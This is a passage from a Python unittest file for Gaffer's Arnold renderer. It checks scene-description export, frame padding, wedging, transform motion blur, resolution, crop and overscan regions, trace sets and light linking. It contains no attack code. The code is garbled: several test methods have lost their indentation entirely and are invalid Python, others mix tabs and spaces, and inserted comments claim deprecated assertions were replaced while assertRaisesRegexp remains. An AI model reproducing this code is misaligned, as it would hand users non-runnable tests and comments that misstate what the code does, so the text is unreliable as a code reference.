    s["render"]["in"].setInput( s["outputs"]["out"] )
    s["render"]["task"].execute()
    # `failUnless` is a deprecated unittest alias (removed in Python 3.12).
    self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.tif" ) )
def testExecuteWithStringSubstitutions( self ) :
    """`####` frame padding in the fileName should be substituted per
    frame when dispatched via `gaffer execute`."""
    s = Gaffer.ScriptNode()
    s["plane"] = GafferScene.Plane()
    s["render"] = GafferArnold.ArnoldRender()
    s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
    s["render"]["in"].setInput( s["plane"]["out"] )
    s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
    s["fileName"].setValue( self.__scriptFileName )
    s.save()
    p = subprocess.Popen(
        "gaffer execute " + self.__scriptFileName + " -frames 1-3",
        shell=True,
        stderr = subprocess.PIPE,
    )
    p.wait()
    # `failIf`/`failUnless` are deprecated unittest aliases (removed in
    # Python 3.12); use the modern assertions instead.
    self.assertFalse( p.returncode )
    for i in range( 1, 4 ) :
        self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%04d.ass" % i ) )
def testImageOutput( self ) :
    """Rendering frames 1-3 in-process should write one padded .tif per
    frame via the `####` substitution in the output path."""
    s = Gaffer.ScriptNode()
    s["plane"] = GafferScene.Plane()
    s["outputs"] = GafferScene.Outputs()
    s["outputs"].addOutput(
        "beauty",
        IECoreScene.Output(
            self.temporaryDirectory() + "/test.####.tif",
            "tiff",
            "rgba",
            {}
        )
    )
    s["outputs"]["in"].setInput( s["plane"]["out"] )
    s["render"] = GafferArnold.ArnoldRender()
    s["render"]["in"].setInput( s["outputs"]["out"] )
    c = Gaffer.Context()
    for i in range( 1, 4 ) :
        c.setFrame( i )
        with c :
            s["render"]["task"].execute()
    # `failUnless` is a deprecated unittest alias (removed in Python 3.12).
    for i in range( 1, 4 ) :
        self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%04d.tif" % i ) )
def testTypeNamePrefixes( self ) :
    """Every type in the Arnold modules must carry the module prefix."""
    for module in ( GafferArnold, GafferArnoldTest ) :
        self.assertTypeNamesArePrefixed( module )
def testDefaultNames( self ) :
    """Default node names in the Arnold modules must match their types."""
    for module in ( GafferArnold, GafferArnoldTest ) :
        self.assertDefaultNamesAreCorrect( module )
def testNodesConstructWithDefaultValues( self ) :
    """Every node in the Arnold modules must construct with defaults."""
    for module in ( GafferArnold, GafferArnoldTest ) :
        self.assertNodesConstructWithDefaultValues( module )
def testDirectoryCreation( self ) :
"""Executing the render task must create the output and .ass directories
referenced via context variables, and must cope with them already
existing on a second execution."""
s = Gaffer.ScriptNode()
s["variables"].addChild( Gaffer.NameValuePlug( "renderDirectory", self.temporaryDirectory() + "/renderTests" ) )
s["variables"].addChild( Gaffer.NameValuePlug( "assDirectory", self.temporaryDirectory() + "/assTests" ) )
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
"$renderDirectory/test.####.exr",
"exr",
"rgba",
{}
)
)
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["fileName"].setValue( "$assDirectory/test.####.ass" )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
# Neither directory may exist before the first execution.
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
# check it can cope with everything already existing
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
def testWedge( self ) :
"""Wedging over the strings "visible"/"hidden" must render two images:
one with the sphere visible and one with it hidden (because the
"hidden" wedge value puts the sphere in the "hidden" set, which the
SetFilter-driven attributes then make invisible)."""
s = Gaffer.ScriptNode()
s["sphere"] = GafferScene.Sphere()
# The wedge value becomes the set name the sphere belongs to.
s["sphere"]["sets"].setValue( "${wedge:value}" )
s["filter"] = GafferScene.SetFilter()
s["filter"]["setExpression"].setValue( "hidden" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["attributes"]["visibility"]["enabled"].setValue( True )
s["attributes"]["attributes"]["visibility"]["value"].setValue( False )
s["attributes"]["filter"].setInput( s["filter"]["out"] )
s["attributes"]["in"].setInput( s["sphere"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/${wedge:value}.tif",
"tiff",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["attributes"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["render"]["in"].setInput( s["outputs"]["out"] )
s["wedge"] = Gaffer.Wedge()
s["wedge"]["mode"].setValue( int( s["wedge"].Mode.StringList ) )
s["wedge"]["strings"].setValue( IECore.StringVectorData( [ "visible", "hidden" ] ) )
s["wedge"]["preTasks"][0].setInput( s["render"]["task"] )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
s.save()
dispatcher = GafferDispatch.LocalDispatcher()
dispatcher["jobsDirectory"].setValue( self.temporaryDirectory() + "/testJobDirectory" )
dispatcher["framesMode"].setValue( GafferDispatch.Dispatcher.FramesMode.CurrentFrame )
dispatcher["executeInBackground"].setValue( False )
dispatcher.dispatch( [ s["wedge"] ] )
hidden = GafferImage.ImageReader()
hidden["fileName"].setValue( self.temporaryDirectory() + "/hidden.tif" )
visible = GafferImage.ImageReader()
visible["fileName"].setValue( self.temporaryDirectory() + "/visible.tif" )
hiddenStats = GafferImage.ImageStats()
hiddenStats["in"].setInput( hidden["out"] )
hiddenStats["area"].setValue( hiddenStats["in"]["dataWindow"].getValue() )
visibleStats = GafferImage.ImageStats()
visibleStats["in"].setInput( visible["out"] )
visibleStats["area"].setValue( visibleStats["in"]["dataWindow"].getValue() )
# Loose brightness thresholds: the hidden render is near-black while the
# visible render has a clearly lit sphere.
self.assertLess( hiddenStats["average"].getValue()[0], 0.05 )
self.assertGreater( visibleStats["average"].getValue()[0], .27 )
@staticmethod
def __m44f( m ) :
    """Flatten an Arnold matrix's `.data` rows into an imath.M44f."""
    values = []
    for row in m.data :
        values.extend( row )
    return imath.M44f( *values )
def testTransformMotion( self ) :
"""Exercise transform motion blur in exported .ass files: no blur,
blur with per-location opt-out (the plane disables transformBlur),
and blur with sampleMotion disabled (blur segments still exported,
but the camera shutter is collapsed)."""
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["sphere"] = GafferScene.Sphere()
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["plane"]["out"] )
s["group"]["in"][1].setInput( s["sphere"]["out"] )
# Animate all three transforms as functions of the frame so blurred
# matrices differ between shutter samples.
s["expression"] = Gaffer.Expression()
s["expression"].setExpression(
inspect.cleandoc(
"""
parent["plane"]["transform"]["translate"]["x"] = context.getFrame()
parent["sphere"]["transform"]["translate"]["y"] = context.getFrame() * 2
parent["group"]["transform"]["translate"]["z"] = context.getFrame() - 1
"""
)
)
s["planeFilter"] = GafferScene.PathFilter()
s["planeFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
# The plane explicitly opts out of transform blur.
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["group"]["out"] )
s["attributes"]["filter"].setInput( s["planeFilter"]["out"] )
s["attributes"]["attributes"]["transformBlur"]["enabled"].setValue( True )
s["attributes"]["attributes"]["transformBlur"]["value"].setValue( False )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["attributes"]["out"] )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["transformBlur"]["enabled"].setValue( True )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# No motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrix = arnold.AiNodeGetMatrix( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrix = arnold.AiNodeGetMatrix( plane, "matrix" )
# Motion parameters should be left at default
self.assertEqual( sphereMotionStart, 0 )
self.assertEqual( sphereMotionEnd, 1 )
self.assertEqual( planeMotionStart, 0 )
self.assertEqual( planeMotionEnd, 1 )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, 2, 0 ) )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, 0 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 1 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1 )
# Motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( True )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
# Default shutter is centred on the frame: [0.75, 1.25] with 2 keys.
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
# The plane's own translate is unblurred (transformBlur off), but it
# still inherits the blurred group translation in z.
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
# Motion blur on, but sampleMotion off
s["options"]["options"]["sampleMotion"]["enabled"].setValue( True )
s["options"]["options"]["sampleMotion"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
# With sampleMotion off the camera shutter collapses to the start.
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 0.75 )
def testResolution( self ) :

	# Check that the `renderResolution` and `resolutionMultiplier` options
	# from StandardOptions are applied to the Arnold options node, both for
	# the default camera and for a camera picked from the scene.

	s = Gaffer.ScriptNode()

	s["camera"] = GafferScene.Camera()

	s["options"] = GafferScene.StandardOptions()
	s["options"]["in"].setInput( s["camera"]["out"] )
	s["options"]["options"]["renderResolution"]["enabled"].setValue( True )
	s["options"]["options"]["renderResolution"]["value"].setValue( imath.V2i( 200, 100 ) )
	s["options"]["options"]["resolutionMultiplier"]["enabled"].setValue( True )
	s["options"]["options"]["resolutionMultiplier"]["value"].setValue( 2 )

	s["render"] = GafferArnold.ArnoldRender()
	s["render"]["in"].setInput( s["options"]["out"] )
	s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
	s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )

	# Default camera should have the right resolution.

	s["render"]["task"].execute()
	with IECoreArnold.UniverseBlock( writable = True ) :
		arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
		options = arnold.AiUniverseGetOptions()
		# 200x100 scaled by the multiplier of 2.
		self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
		self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )

	# As should a camera picked from the scene.

	s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
	s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
	s["render"]["task"].execute()
	with IECoreArnold.UniverseBlock( writable = True ) :
		arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
		options = arnold.AiUniverseGetOptions()
		self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
		self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
def testRenderRegion( self ) :

	# Check that crop windows and overscan from StandardOptions are
	# translated into Arnold's inclusive `region_min/max` pixel bounds.

	s = Gaffer.ScriptNode()

	s["camera"] = GafferScene.Camera()

	s["options"] = GafferScene.StandardOptions()
	s["options"]["in"].setInput( s["camera"]["out"] )
	s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
	s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )

	s["render"] = GafferArnold.ArnoldRender()
	s["render"]["in"].setInput( s["options"]["out"] )
	s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
	s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )

	# Default region : the whole 640x480 image.
	s["render"]["task"].execute()
	with IECoreArnold.UniverseBlock( writable = True ) :
		arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
		options = arnold.AiUniverseGetOptions()
		self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
		self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
		# Region bounds are inclusive pixel coordinates.
		self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 639 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )

	# Apply Crop Window. The window is specified in normalised (0-1)
	# coordinates; the expected values below show y mapping with
	# y increasing downwards in Arnold's region space.
	s["options"]["options"]["renderCropWindow"]["enabled"].setValue( True )
	s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f( imath.V2f( 0.25, 0.5 ), imath.V2f( 0.75, 1.0 ) ) )
	s["render"]["task"].execute()
	with IECoreArnold.UniverseBlock( writable = True ) :
		arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
		options = arnold.AiUniverseGetOptions()
		self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
		self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 160 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 479 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 240 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )

	# Test Empty Crop Window
	s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f() )
	s["render"]["task"].execute()
	with IECoreArnold.UniverseBlock( writable = True ) :
		arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
		options = arnold.AiUniverseGetOptions()
		self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
		self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
		# Since Arnold doesn't support empty regions, we default to one pixel in the corner
		self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 0 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 479 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )

	# Apply Overscan. Fractions are relative to image size, so e.g.
	# 0.3 * 640 = 192 extra pixels on the left (matching -192 below).
	s["options"]["options"]["renderCropWindow"]["enabled"].setValue( False )
	s["options"]["options"]["overscan"]["enabled"].setValue( True )
	s["options"]["options"]["overscan"]["value"].setValue( True )
	s["options"]["options"]["overscanTop"]["enabled"].setValue( True )
	s["options"]["options"]["overscanTop"]["value"].setValue( 0.1 )
	s["options"]["options"]["overscanBottom"]["enabled"].setValue( True )
	s["options"]["options"]["overscanBottom"]["value"].setValue( 0.2 )
	s["options"]["options"]["overscanLeft"]["enabled"].setValue( True )
	s["options"]["options"]["overscanLeft"]["value"].setValue( 0.3 )
	s["options"]["options"]["overscanRight"]["enabled"].setValue( True )
	s["options"]["options"]["overscanRight"]["value"].setValue( 0.4 )
	s["render"]["task"].execute()
	with IECoreArnold.UniverseBlock( writable = True ) :
		arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
		options = arnold.AiUniverseGetOptions()
		self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
		self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), -192 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 640 + 255 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), -48 )
		self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 480 + 95 )
def testMissingCameraRaises( self ) :

	# Requesting a render camera that doesn't exist in the scene must
	# raise, and the error must mention the offending path.

	script = Gaffer.ScriptNode()

	script["options"] = GafferScene.StandardOptions()
	script["options"]["options"]["renderCamera"]["enabled"].setValue( True )
	script["options"]["options"]["renderCamera"]["value"].setValue( "/i/dont/exist" )

	script["render"] = GafferArnold.ArnoldRender()
	script["render"]["in"].setInput( script["options"]["out"] )
	script["render"]["mode"].setValue( script["render"].Mode.SceneDescriptionMode )
	script["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )

	# The requested camera doesn't exist - this should raise an exception.
	self.assertRaisesRegexp( RuntimeError, "/i/dont/exist", script["render"]["task"].execute )

	# And even the existence of a different camera shouldn't change that.
	script["camera"] = GafferScene.Camera()
	script["options"]["in"].setInput( script["camera"]["out"] )
	self.assertRaisesRegexp( RuntimeError, "/i/dont/exist", script["render"]["task"].execute )
def testManyCameras( self ) :

	# A scene with /camera duplicated 1000 times should still write a
	# scene description without error.

	cameraNode = GafferScene.Camera()

	duplicator = GafferScene.Duplicate()
	duplicator["in"].setInput( cameraNode["out"] )
	duplicator["target"].setValue( "/camera" )
	duplicator["copies"].setValue( 1000 )

	renderNode = GafferArnold.ArnoldRender()
	renderNode["in"].setInput( duplicator["out"] )
	renderNode["mode"].setValue( renderNode.Mode.SceneDescriptionMode )
	renderNode["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )

	renderNode["task"].execute()
def testTwoRenders( self ) :

	# Execute the same render task concurrently on two threads (for two
	# different frames). Exactly one execution should fail, with an error
	# reporting that Arnold is already in use.

	sphere = GafferScene.Sphere()

	duplicate = GafferScene.Duplicate()
	duplicate["in"].setInput( sphere["out"] )
	duplicate["target"].setValue( "/sphere" )
	# Many copies - presumably to make each render slow enough that the
	# two executions actually overlap (TODO confirm).
	duplicate["copies"].setValue( 10000 )

	render = GafferArnold.ArnoldRender()
	render["in"].setInput( duplicate["out"] )
	render["mode"].setValue( render.Mode.SceneDescriptionMode )
	# Frame-numbered file name, so each thread writes a different file.
	render["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )

	errors = []
	def executeFrame( frame ) :

		with Gaffer.Context() as c :
			c.setFrame( frame )
			try :
				render["task"].execute()
			except Exception as e :
				errors.append( str( e ) )

	threads = []
	for i in range( 0, 2 ) :
		t = threading.Thread( target = executeFrame, args = ( i, ) )
		t.start()
		threads.append( t )

	for t in threads :
		t.join()

	# One thread wins, one reports the conflict.
	self.assertEqual( len( errors ), 1 )
	self.assertTrue( "Arnold is already in use" in errors[0] )
def testTraceSets( self ) :

	# Sets named "render:*" should be exported to Arnold as per-object
	# `trace_sets`, with the "render:" prefix stripped, and with
	# membership inherited from ancestor locations (see assertions below).

	sphere = GafferScene.Sphere()
	group = GafferScene.Group()
	group["in"][0].setInput( sphere["out"] )
	group["in"][1].setInput( sphere["out"] )

	# One set per sphere...
	set1 = GafferScene.Set()
	set1["name"].setValue( "render:firstSphere" )
	set1["paths"].setValue( IECore.StringVectorData( [ "/group/sphere" ] ) )
	set1["in"].setInput( group["out"] )

	set2 = GafferScene.Set()
	set2["name"].setValue( "render:secondSphere" )
	set2["paths"].setValue( IECore.StringVectorData( [ "/group/sphere1" ] ) )
	set2["in"].setInput( set1["out"] )

	# ...one containing only the parent group...
	set3 = GafferScene.Set()
	set3["name"].setValue( "render:group" )
	set3["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
	set3["in"].setInput( set2["out"] )

	# ...and one containing both spheres explicitly.
	set4 = GafferScene.Set()
	set4["name"].setValue( "render:bothSpheres" )
	set4["paths"].setValue( IECore.StringVectorData( [ "/group/sphere", "/group/sphere1" ] ) )
	set4["in"].setInput( set3["out"] )

	render = GafferArnold.ArnoldRender()
	render["in"].setInput( set4["out"] )
	render["mode"].setValue( render.Mode.SceneDescriptionMode )
	render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )

	render["task"].execute()

	with IECoreArnold.UniverseBlock( writable = True ) :

		arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )

		firstSphere = arnold.AiNodeLookUpByName( "/group/sphere" )
		secondSphere = arnold.AiNodeLookUpByName( "/group/sphere1" )

		# Each sphere sees its own set, the inherited "group" set and the
		# shared "bothSpheres" set - but not the other sphere's set.
		self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( firstSphere, "trace_sets" ) ), { "firstSphere", "group", "bothSpheres" } )
		self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( secondSphere, "trace_sets" ) ), { "secondSphere", "group", "bothSpheres" } )
def testSetsNeedContextEntry( self ) :

	# The light's name is driven by an expression reading a custom
	# context variable. Executing the render repeatedly, each time in a
	# context providing that variable, must succeed every time.

	script = Gaffer.ScriptNode()

	script["light"] = GafferArnold.ArnoldLight()
	script["light"].loadShader( "point_light" )

	script["expression"] = Gaffer.Expression()
	script["expression"].setExpression(
		"""parent["light"]["name"] = context["lightName"]"""
	)

	script["render"] = GafferArnold.ArnoldRender()
	script["render"]["in"].setInput( script["light"]["out"] )
	script["render"]["mode"].setValue( script["render"].Mode.SceneDescriptionMode )
	script["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )

	for iteration in range( 100 ) :
		with Gaffer.Context() as renderContext :
			renderContext["lightName"] = "light%d" % iteration
			script["render"]["task"].execute()
def testFrameAndAASeed( self ) :

	# Arnold's AA_seed should come from the `aaSeed` option when enabled,
	# and fall back to the rounded current frame number otherwise.

	options = GafferArnold.ArnoldOptions()

	render = GafferArnold.ArnoldRender()
	render["in"].setInput( options["out"] )
	render["mode"].setValue( render.Mode.SceneDescriptionMode )
	render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )

	# Non-integer frames included, to exercise the rounding fallback.
	for frame in ( 1, 2, 2.8, 3.2 ) :
		for seed in ( None, 3, 4 ) :
			with Gaffer.Context() as c :

				c.setFrame( frame )
				# `seed is None` means "use the fallback" - the option is
				# disabled, so the value set below is ignored.
				options["options"]["aaSeed"]["enabled"].setValue( seed is not None )
				options["options"]["aaSeed"]["value"].setValue( seed or 1 )

				render["task"].execute()

				with IECoreArnold.UniverseBlock( writable = True ) :

					arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )

					self.assertEqual(
						arnold.AiNodeGetInt( arnold.AiUniverseGetOptions(), "AA_seed" ),
						seed or round( frame )
					)
def testRendererContextVariable( self ) :

	# The `scene:renderer` context variable must be substituted while
	# rendering : "sphere${scene:renderer}" should become "/sphereArnold".

	sphereNode = GafferScene.Sphere()
	sphereNode["name"].setValue( "sphere${scene:renderer}" )

	renderNode = GafferArnold.ArnoldRender()
	renderNode["in"].setInput( sphereNode["out"] )
	renderNode["mode"].setValue( renderNode.Mode.SceneDescriptionMode )
	renderNode["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )

	renderNode["task"].execute()

	with IECoreArnold.UniverseBlock( writable = True ) :

		arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
		self.assertTrue( arnold.AiNodeLookUpByName( "/sphereArnold" ) is not None )
def testAdaptors( self ) :

	# Check that a registered render adaptor is applied at render time :
	# the adaptor below turns `matte` on for everything, and we verify
	# the exported sphere picked that attribute up.

	def a() :

		result = GafferArnold.ArnoldAttributes()
		result["attributes"]["matte"]["enabled"].setValue( True )
		result["attributes"]["matte"]["value"].setValue( True )

		return result

	# NOTE(review) : registration is global and is not undone at the end
	# of the test, so the adaptor leaks into later tests in this process.
	GafferScene.registerAdaptor( "Test", a )

	# Fixed : a redundant `sphere = GafferScene.Sphere()` that was
	# immediately shadowed by this one has been removed.
	sphere = GafferScene.Sphere()

	render = GafferArnold.ArnoldRender()
	render["in"].setInput( sphere["out"] )
	render["mode"].setValue( render.Mode.SceneDescriptionMode )
	render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )

	render["task"].execute()

	with IECoreArnold.UniverseBlock( writable = True ) :

		arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
		node = arnold.AiNodeLookUpByName( "/sphere" )

		self.assertEqual( arnold.AiNodeGetBool( node, "matte" ), True )
def testLightAndShadowLinking( self ) :

	# Check that `linkedLights` and `ai:visibility:shadow_group` attributes
	# are translated into Arnold's `light_group`/`use_light_group` and
	# `shadow_group`/`use_shadow_group` parameters, and that objects with
	# no linking attributes are exported with linking disabled.

	sphere1 = GafferScene.Sphere()
	sphere2 = GafferScene.Sphere()

	attributes = GafferScene.StandardAttributes()
	arnoldAttributes = GafferArnold.ArnoldAttributes()

	light1 = GafferArnold.ArnoldLight()
	light1.loadShader( "point_light" )

	light2 = GafferArnold.ArnoldLight()
	light2.loadShader( "point_light" )

	group = GafferScene.Group()
	group["in"].addChild( GafferScene.ScenePlug( "in1" ) )
	group["in"].addChild( GafferScene.ScenePlug( "in2" ) )
